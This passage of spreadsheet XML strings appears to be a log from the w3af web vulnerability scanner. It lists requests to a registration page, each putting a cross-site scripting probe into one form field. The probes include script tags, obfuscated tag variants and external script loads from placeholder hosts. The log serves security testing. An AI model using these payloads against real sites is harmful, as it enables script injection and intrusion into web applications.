    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script&gt;fake_alert("nlnc")&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;_x0000_script&gt;fake_alert("nlnc")&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script&gt;fake_alert(string.fromcharcode(nlnc))&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script&gt;a=/nlnc/fake_alert(a.source)&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=zzpdk&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script/src=http://4ndi/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script+src=http://4ndi/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;a=/4ndi/fake_alert(a.source)&lt;/script&gt;&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password='';!--"&lt;4ndi&gt;=&amp;{()}&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;fake_alert(string.fromcharcode(4ndi))&lt;/script&gt;&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=glkor&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;fake_alert(string.fromcharcode(ytmu))&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;a=/ytmu/fake_alert(a.source)&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;fake_alert("ytmu")&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email='';!--"&lt;ytmu&gt;=&amp;{()}&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script+src=http://ytmu/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script/src=http://ytmu/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;_x0000_script&gt;fake_alert("ytmu")&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=luaeh&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script&gt;a=/bpmg/fake_alert(a.source)&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script&gt;fake_alert("bpmg")&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=tawhp&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=i2lvs&lt;v0cg&gt;v0cg"v0cg'v0cg(v0cg)i2lvs&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&lt;script&gt;alert("fd8x")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&gt;a=/fd8x/alert(a.source)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/src=http://fd8x/x.js&gt;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javas	cript:alert("fd8x");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+src=http://fd8x/x.js&gt;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&gt;alert(string.fromcharcode(fd8x))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scr_x0000_ipt&gt;alert("fd8x")&lt;/sc_x0000_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+src=http://7a90/x.js&gt;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_x0000_script&gt;fake_alert("7a90")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/src=http://7a90/x.js&gt;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'';!--"&lt;7a90&gt;=&amp;{()}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&gt;fake_alert(string.fromcharcode(7a90))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/xss+src=http://7a90/x.js&gt;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&gt;a=/7a90/fake_alert(a.source)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cp=&lt;script&gt;fake_alert("7a90")&lt;/script&gt;&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=qbemv&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=wl56e&lt;kat3&gt;kat3"kat3'kat3(kat3)wl56e&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=&lt;script&gt;a=/sdl2/alert(a.source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&gt;alert(string.fromcharcode(sdl2)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&gt;alert("sdl2"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+src=http://sdl2/x.js&gt;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/src=http://sdl2/x.js&gt;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/xss+src=http://zxwj/x.js&gt;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_x0000_script&gt;fake_alert("zxwj"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&gt;a=/zxwj/fake_alert(a.source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&gt;fake_alert(string.fromcharcode(zxwj))&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=&lt;script/src=http://zxwj/x.js&gt;&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=oqgru&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script+src=http://13ew/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni='';!--"&lt;13ew&gt;=&amp;{()}&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script&gt;fake_alert(string.fromcharcode(13ew))&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script&gt;a=/13ew/fake_alert(a.source)&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script/src=http://13ew/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=&lt;_x0000_script&gt;fake_alert("13ew")&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script/xss+src=http://13ew/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script&gt;fake_alert("13ew")&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=iw7kl&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=&lt;script&gt;fake_alert(string.fromcharcode(47lv))&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=&lt;script&gt;a=/47lv/fake_alert(a.source)&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=&lt;script/xss+src=http://47lv/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=83qfn&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;a=/uqvm/fake_alert(a.source)&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert("uqvm")&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos='';!--"&lt;uqvm&gt;=&amp;{()}&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script/xss+src=http://uqvm/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;_x0000_script&gt;fake_alert("uqvm")&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert(string.fromcharcode(uqvm))&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=grqnv&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;a=/snhe/fake_alert(a.source)&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;fake_alert("snhe")&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad='';!--"&lt;snhe&gt;=&amp;{()}&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script+src=http://snhe/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=y86cd</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo='';!--"&lt;vzgu&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script+src=http://vzgu/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;fake_alert("vzgu")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;fake_alert(string.fromcharcode(vzgu))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;a=/vzgu/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=qnmjd&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert("dhqk")&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert(string.fromcharcode(dhqk))&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre='';!--"&lt;dhqk&gt;=&amp;{()}&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=aohfn&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script/xss+src=http://bfuz/x.js&gt;&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script&gt;fake_alert("bfuz")&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script+src=http://bfuz/x.js&gt;&lt;/script&gt;&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=jkt2f&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password='';!--"&lt;6qge&gt;=&amp;{()}&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script/xss+src=http://6qge/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script/src=http://6qge/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;fake_alert(string.fromcharcode(6qge))&lt;/script&gt;&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;_x0000_script&gt;fake_alert("6qge")&lt;/script&gt;&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;fake_alert("6qge")&lt;/script&gt;&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=pmqzb&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;a=/a8tk/fake_alert(a.source)&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;fake_alert("a8tk")&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script+src=http://a8tk/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email='';!--"&lt;a8tk&gt;=&amp;{()}&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;fake_alert(string.fromcharcode(a8tk))&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script/xss+src=http://a8tk/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
